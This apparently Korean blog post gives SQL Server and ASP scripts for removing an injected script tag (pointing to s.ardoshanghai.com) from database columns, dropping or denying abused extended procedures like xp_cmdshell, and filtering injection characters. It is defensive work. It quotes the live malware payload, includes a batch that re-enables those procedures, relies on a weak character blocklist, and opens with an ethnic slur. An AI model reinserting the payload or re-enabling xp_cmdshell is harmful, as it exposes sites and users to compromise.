1. 일단 이미 들어온 짱개놈들~~ 삭제쿼리는 다음과 같이

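-- Clean-up script: strips the injected <script> tag out of every text-like column
-- (ntext 99, text 35, nvarchar 231, varchar 167) of every user table in the current database.
-- Changes versus the pasted original:
--   * the payload is bound once through sp_executesql instead of being pasted into each statement;
--   * table/column names go through QUOTENAME so a name containing ']' cannot break the dynamic SQL;
--   * tables are owner-qualified so tables not owned by dbo still resolve;
--   * Unicode columns are converted to nvarchar, not varchar, so characters outside the server
--     code page are not lost while the tag is removed.
-- Caveat: CONVERT to varchar(8000)/nvarchar(4000) truncates longer text/ntext values; on SQL Server 2005+
-- use nvarchar(max) instead. char/nchar columns (xtype 175/239) are not in the list, as in the original.
DECLARE @Owner sysname, @T sysname, @C sysname, @XType int
DECLARE @Payload nvarchar(4000), @Sql nvarchar(4000), @CastType nvarchar(30)

-- The exact string found in the affected rows; change it to the tag that was actually injected.
SET @Payload = N'<script src=http://s.ardoshanghai.com/s.js></script>'

DECLARE Table_Cursor CURSOR FOR
SELECT USER_NAME(a.uid), a.name, b.name, b.xtype
FROM sysobjects AS a
INNER JOIN syscolumns AS b
    ON a.id = b.id
WHERE a.xtype = 'U'                       -- user tables only
  AND b.xtype IN (99, 35, 231, 167)       -- ntext, text, nvarchar, varchar

OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @Owner, @T, @C, @XType
WHILE (@@FETCH_STATUS = 0) BEGIN
    -- keep Unicode columns Unicode during the REPLACE
    SET @CastType = CASE WHEN @XType IN (99, 231) THEN N'nvarchar(4000)' ELSE N'varchar(8000)' END

    SET @Sql = N'UPDATE ' + QUOTENAME(@Owner) + N'.' + QUOTENAME(@T)
             + N' SET ' + QUOTENAME(@C)
             + N' = REPLACE(CONVERT(' + @CastType + N', ' + QUOTENAME(@C) + N'), @Payload, N'''')'
             + N' WHERE ' + QUOTENAME(@C) + N' LIKE N''%<script%'''   -- only touch rows that carry a tag

    EXEC sp_executesql @Sql, N'@Payload nvarchar(4000)', @Payload

    FETCH NEXT FROM Table_Cursor INTO @Owner, @T, @C, @XType
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor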

-- Sanity check after the clean-up: reports the files that back the current database.
EXECUTE sp_helpfile;

빨간 부분(위 쿼리의 <script src=...></script> 문자열)에는 실제로 삽입된 스크립트를 넣는다!!

2. 다음은 SQL Injection 방지를 위하여~~~ 여기저기 참조하여 만들어본 쿼리~~

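-- Batch 1: unregister xp_cmdshell if it is still registered (the pasted version used
-- typographic quotes, which do not parse in T-SQL).
-- On SQL Server 2005 and later sp_dropextendedproc is deprecated; the supported control there is
--   EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;
USE master
IF OBJECT_ID('[dbo].[xp_cmdshell]') IS NOT NULL BEGIN
    EXEC sp_dropextendedproc 'xp_cmdshell'
END
GO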
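-- Batch 2: unregister the extended procedures most often abused after an injection
-- (file-system probing, registry access, OLE automation, web tasks).
-- Quotes are fixed (the paste used typographic quotes) and names are written in their
-- catalog case so the lookup would also match under a case-sensitive server collation.
-- Unregistering does not delete the DLLs; see the DENY/REVOKE batches for the permission side.
USE master
-- file system / server probing
EXEC sp_dropextendedproc 'xp_dirtree'
EXEC sp_dropextendedproc 'xp_enumgroups'
EXEC sp_dropextendedproc 'xp_fixeddrives'
EXEC sp_dropextendedproc 'xp_loginconfig'
EXEC sp_dropextendedproc 'xp_enumerrorlogs'
EXEC sp_dropextendedproc 'xp_getfiledetails'
-- OLE automation
EXEC sp_dropextendedproc 'sp_OACreate'
EXEC sp_dropextendedproc 'sp_OADestroy'
EXEC sp_dropextendedproc 'sp_OAGetErrorInfo'
EXEC sp_dropextendedproc 'sp_OAGetProperty'
EXEC sp_dropextendedproc 'sp_OAMethod'
EXEC sp_dropextendedproc 'sp_OASetProperty'
EXEC sp_dropextendedproc 'sp_OAStop'
-- registry access
EXEC sp_dropextendedproc 'xp_regaddmultistring'
EXEC sp_dropextendedproc 'xp_regdeletekey'
EXEC sp_dropextendedproc 'xp_regdeletevalue'
EXEC sp_dropextendedproc 'xp_regenumvalues'
EXEC sp_dropextendedproc 'xp_regread'
EXEC sp_dropextendedproc 'xp_regremovemultistring'
EXEC sp_dropextendedproc 'xp_regwrite'
-- web task generation; guarded so re-running the batch does not error
IF OBJECT_ID('[dbo].[sp_makewebtask]') IS NOT NULL BEGIN
    DROP PROCEDURE sp_makewebtask
END
GO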

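-- Batch 3: RESTORE script. It re-registers the procedures unregistered in the previous batch
-- (everything except the sp_OA* set) from their original DLLs.
-- Do NOT run this as part of the hardening: executed right after the drop batch it reverses it,
-- leaving only the REVOKE/DENY batches below in effect. Keep it for rolling back on a server
-- where a legitimate job depends on one of these procedures.
USE master
EXEC sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'
EXEC sp_addextendedproc 'xp_dirtree', 'xpstar.dll'
EXEC sp_addextendedproc 'xp_enumgroups', 'xplog70.dll'
EXEC sp_addextendedproc 'xp_fixeddrives', 'xpstar.dll'
EXEC sp_addextendedproc 'xp_loginconfig', 'xplog70.dll'
EXEC sp_addextendedproc 'xp_regaddmultistring', 'xpstar.dll'
EXEC sp_addextendedproc 'xp_regdeletekey', 'xpstar.dll'
EXEC sp_addextendedproc 'xp_regdeletevalue', 'xpstar.dll'
EXEC sp_addextendedproc 'xp_regread', 'xpstar.dll'
EXEC sp_addextendedproc 'xp_regremovemultistring', 'xpstar.dll'
EXEC sp_addextendedproc 'xp_regwrite', 'xpstar.dll'
EXEC sp_addextendedproc 'xp_enumerrorlogs', 'xpstar.dll'
EXEC sp_addextendedproc 'xp_getfiledetails', 'xpstar.dll'
EXEC sp_addextendedproc 'xp_regenumvalues', 'xpstar.dll'
GO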

-- Batch 4 (still in master): take the default EXECUTE grant on registry/web-task procedures away from public.
-- REVOKE only removes this grant; a principal that receives EXECUTE through another role keeps it —
-- the DENY batch further down is the stronger form for that case.
REVOKE EXECUTE ON [xp_regread] FROM [public]
REVOKE EXECUTE ON [xp_instance_regread] FROM [public]
REVOKE EXECUTE ON [dbo].[sp_runwebtask] FROM [public]
GO

-- Batch 5: in msdb, stop public from creating/starting Agent jobs and from reading
-- web-task and DTS package definitions (both are common ways to run code outside the database).
USE msdb
-- SQL Agent job creation and execution
REVOKE EXECUTE ON [sp_add_job] FROM [public]
REVOKE EXECUTE ON [sp_add_jobstep] FROM [public]
REVOKE EXECUTE ON [sp_add_jobserver] FROM [public]
REVOKE EXECUTE ON [sp_start_job] FROM [public]
-- web tasks and DTS
REVOKE ALL ON [dbo].[mswebtasks] FROM [public]
REVOKE EXECUTE ON [sp_enum_dtspackages] FROM [public]
REVOKE EXECUTE ON [sp_get_dtspackage] FROM [public]
REVOKE EXECUTE ON [sp_get_sqlagent_properties] FROM [public]
GO

-- Batch 6: DBCC <dllname> (FREE) unloads an extended-procedure DLL from memory.
-- NOTE(review): the argument is a DLL name; the DLLs registered earlier on this page are
-- xplog70.dll and xpstar.dll, so passing procedure names here may not unload anything — verify.
-- sp_adduser is a Transact-SQL system procedure rather than a DLL-backed one, so that line is
-- likely a no-op or an error.
USE master
DBCC xp_cmdshell (FREE)
DBCC xp_dirtree (FREE)
DBCC xp_regdeletekey (FREE)
DBCC xp_regenumvalues (FREE)
DBCC xp_regread (FREE)
DBCC xp_regwrite (FREE)
DBCC sp_makewebtask (FREE)
DBCC sp_adduser (FREE)
GO

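-- Batch 7: explicit DENY (overrides any grant) on file-system and registry procedures for the guest user.
-- The duplicate xp_regaddmultistring line of the original is removed.
-- This only covers guest; logins that reach master through public or another role are not affected —
-- the REVOKE batches above are what limit public, and a DENY TO [public] would be the stronger choice.
USE master
-- file system
DENY EXECUTE ON [master].[dbo].[xp_subdirs] TO [guest] CASCADE
DENY EXECUTE ON [master].[dbo].[xp_dirtree] TO [guest] CASCADE
DENY EXECUTE ON [master].[dbo].[xp_availablemedia] TO [guest] CASCADE
DENY EXECUTE ON [master].[dbo].[xp_fileexist] TO [guest] CASCADE
DENY EXECUTE ON [master].[dbo].[xp_fixeddrives] TO [guest] CASCADE
DENY EXECUTE ON [master].[dbo].[xp_getfiledetails] TO [guest] CASCADE
-- registry
DENY EXECUTE ON [master].[dbo].[xp_regwrite] TO [guest] CASCADE
DENY EXECUTE ON [master].[dbo].[xp_regread] TO [guest] CASCADE
DENY EXECUTE ON [master].[dbo].[xp_regaddmultistring] TO [guest] CASCADE
DENY EXECUTE ON [master].[dbo].[xp_regdeletekey] TO [guest] CASCADE
DENY EXECUTE ON [master].[dbo].[xp_regdeletevalue] TO [guest] CASCADE
DENY EXECUTE ON [master].[dbo].[xp_regremovemultistring] TO [guest] CASCADE
GO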

3. 다음은 ASP 관련 처리가 되겠다~!

페이지 상단 처리

인젝션 유형: 제일 많이 쓰이는 내용이 "--" 혹은 "'" 혹은 ";"

이 세 개의 특수문자이기 때문에, 쿼리스트링에서 해당 문자열이 포착되면
에러 페이지로 이동됩니다.

1) 일반형식
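' Page-top guard: redirects to the error page when the value contains one of the three
' markers this site screens for (apostrophe, "--", ";"); otherwise returns the value unchanged.
'   string : the raw request value to inspect (Null/Empty is treated as "")
'   returns: the input when it passes; on a hit Response.Redirect ends the page instead
' Fixes versus the pasted original: the "--" literal had become an en dash, and the second and
' third Instr calls lacked "> 0" (they only worked because Or is bitwise on the integer result);
' a Null input now no longer makes Instr return Null and skip both branches.
' A character blocklist does not make a query safe by itself — the query that consumes the
' value must still bind it as an ADO parameter rather than concatenate it.
Function RequestCheck(string)
    Dim str, value
    value = string & ""   ' normalise Null/Empty to an empty string before Instr
    If Instr(value, "'") > 0 Or Instr(value, "--") > 0 Or Instr(value, ";") > 0 Then
        Response.Redirect "/error.asp"
    Else
        str = value
    End If
    RequestCheck = str
End Function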

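' Run the guard once against the raw query string. RequestCheck redirects on a hit,
' so its return value is intentionally discarded here. (Quotes fixed from the paste.)
Qri = Request.ServerVariables("Query_String")
Call RequestCheck(Qri)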

2) 폼형식

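' Screens a form field for the two markers checked here ("--" and ";").
'   string : the raw form value (Null/Empty is treated as "")
'   opt    : 1 = rewrite the markers ("--" -> "..", ";" -> ":") and return the edited value
'            2 = redirect to the error page instead
'            any other value returns Empty when a marker is found (kept from the original)
'   returns: the (possibly edited) value
' Bug fixed: with opt = 1 the original replaced the uninitialised local "str" instead of the
' input, so the field was always returned as an empty string. Quotes and the "--" literal are
' also restored from the paste. Unlike RequestCheck the apostrophe is not screened here;
' rewriting characters is not a substitute for binding the value as a query parameter.
Function FormCheck(string, opt)
    Dim str, value
    value = string & ""   ' Instr returns Null for a Null argument, which would skip both branches
    If Instr(value, "--") > 0 Or Instr(value, ";") > 0 Then
        If opt = 1 Then
            str = Replace(value, "--", "..")
            str = Replace(str, ";", ":")
        ElseIf opt = 2 Then
            Response.Redirect "/error.asp"
        End If
    Else
        str = value
    End If
    FormCheck = str
End Function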

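' opt = 1: markers in the subject are rewritten rather than rejected, so the value is kept but may be altered.
subject = FormCheck(Request.Form("subject"), 1)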